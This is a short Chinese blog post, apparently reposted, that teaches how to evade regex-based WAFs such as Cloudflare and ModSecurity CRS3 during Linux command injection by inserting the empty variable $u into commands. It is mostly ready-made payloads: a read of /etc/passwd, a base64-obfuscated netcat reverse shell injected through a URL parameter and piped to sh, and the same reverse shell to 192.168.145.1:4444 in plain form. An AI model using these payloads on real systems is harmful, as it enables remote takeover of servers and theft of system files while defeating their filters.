绕过 linux 命令执行中的恶意指令

当某个站点存在命令执行时,可通过linux的空变量$u来绕过正则WAF匹配:

使用空变量$u,linux中是可以存在空变量的,直接被系统视为空字符串,空变量不会对输出造成影响,可以借此来绕过基于正则表达式的过滤器和模式匹配。
绕过CloudFlare WAF和ModSecurityOWASP CRS3核心规则集的技巧介绍

cat$u /etc$u/passwd$u
curl-s "http://192.168.145.5/test.php?file=&/bin$u/echo$u bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjE0NS4xIDQ0NDQgICAK|/usr$u/bin$u/base64$u -d|/bin$u/sh$u"

curl-s "http://192.168.145.5/test.php?file=&/bin/ nc -e /bin/sh 192.168.145.1 4444"

猜你喜欢

转载自www.cnblogs.com/-mo-/p/12088280.html